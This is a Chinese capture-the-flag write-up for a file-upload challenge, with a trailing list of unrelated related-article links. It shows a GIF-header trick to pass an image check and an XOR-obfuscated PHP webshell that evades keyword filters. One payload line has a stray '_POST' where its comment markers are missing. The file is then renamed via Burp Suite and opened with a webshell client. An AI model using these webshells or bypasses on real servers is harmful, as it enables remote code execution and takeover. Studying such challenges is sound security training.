WEB-easy_upload
题目
进去之后看到这样一句话
ctrl+u得到提示
按照提示进去看看,发现是个文件上传的链接
按照提示修改staus的值然后上传一个木马文件看看
发现报错了,只允许上传图片文件
把后缀改成jpg再试试看
依旧报错,它不仅对后缀名有要求而且会检查文件格式是否符合图片
给一句话木马的开头加上图片格式进行绕过
GIF89a
<?php @eval($_POST["yexi"]);?>
还是哒咩~过滤太多函数了
利用异或的方法重新构造一句话木马
GIF89a
<?=
@$_++;
$___=("~"^"?").("~"^"-").("~"^"-").("~"^";").("~"^",").("~"^"*");//ASSERT
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");_POST
$___(${$__}[1]);//ASSERT($_POST[1])
?>
因为上传的过程中会检查文件中的关键词所以要把注释去掉,不然会报错
用burpsuite进行抓包,将上传的jpg文件改成php,放掉
上传成功,可以在uploads中查看
用蚁剑连接,注意勾选base64,连接成功
按照提示打开index.php即可得到flag
WEB-easy_upload相关推荐
- UNCTF2020 | Web Wp
文章目录 Web 0x01:easy_ssrf 0x02:babyeval 0x03:ezphp 0x04:easy_upload 0x05:L0vephp 0x06:easyflask 0x07:e ...
- 在k8s中使用gradle构建java web项目镜像Dockerfile
在k8s中使用gradle构建java web项目镜像Dockerfile FROM gradle:6-jdk8 AS build COPY --chown=gradle:gradle . /home ...
- 手动将web项目的class文件打成jar包,手动打jar包,java -cvf,IDE打包底层指令
手动将web项目的class文件打成jar包. 我们的项目在使用IDE进行编译后,在项目的target目录下将会生成class文件.我们可以将class文件打成jar包. 使用的到命令为: 在targ ...
- 将Eclipse中Web项目打成war包
将Eclipse中Web项目打成war包 请按如下操作即可:
- Docker安装Apache与运行简单的web服务——httpd helloworld
Docker运行简单的web服务--httpd helloworld目录[阅读时间:约5分钟] 一.Docker简介 二.Docker的安装与配置[CentOS环境] 三.Docker运行简单的web ...
- 【Golang源码分析】Go Web常用程序包gorilla/mux的使用与源码简析
目录[阅读时间:约10分钟] 一.概述 二.对比: gorilla/mux与net/http DefaultServeMux 三.简单使用 四.源码简析 1.NewRouter函数 2.HandleF ...
- 基于Golang的简单web服务程序开发——CloudGo
基于Golang的简单web服务程序开发--CloudGo[阅读时间:约10分钟] 一.概述 二.系统环境&项目介绍 1.系统环境 2.项目的任务要求 (1)基本要求 (2)扩展要求 三.具体 ...
- CentOS Docker安装配置部署Golang web helloworld
目录[阅读时间:约5分钟] 一.Docker简介 二.Docker的安装与配置[CentOS环境] 三.Docker部署Golang web helloworld 四.Docker与虚拟机的区别 五. ...
- ideal如何创建dynamic web project
步骤如下 ① file -> new -> project ② 选择 Java Enterprise -> next ③ create project from template - ...
- eclipse运行maven web项目
说在前面:Maven项目对象模型(POM),可以通过一小段描述信息来管理项目的构建,报告和文档的软件项目管理工具.现在好多公司都在使用.有时候我们想在eclipse启动maven项目,怎么操作呢,下面 ...
最新文章
- java 关于分页的实现
- CNCF 宣布成立应用交付领域小组,正式开启云原生应用时代
- 不会跳回到微博认定申请书
- es elasticsearch 几种常见查询场景 二次分组 java读取es的查询json文件
- JSON数据从OSS迁移到MaxCompute最佳实践 1
- Confluence 6 完成你的任务
- 大学生在校期间可以考哪些证书?
- 红帽发布虚拟化策略 产品即将上市
- Oracle监听注册和sqlnet,Oracle监听配置(四)--如何实现静态、动态注册
- linux内核C -- 第09课:链接过程中的强符号和弱符号
- 计算机软件水平考试中级题目,计算机软考中级考试试题及答案
- 前端跨域解决方案总结
- 一起学libcef--一个应用libcef的简单例子(windows程序)
- 效率直接起飞的PPT技巧,你知道吗
- MIUI12系统怎么样开启Root超级权限的流程
- 风儿轻轻地吹,沙儿轻轻地飘
- CLH Lock 原理
- R语言 | 编写自己的函数
- 使用在线链接阿里图标库(iconfont)(vue)
- MVVM理解 ——(2)数据劫持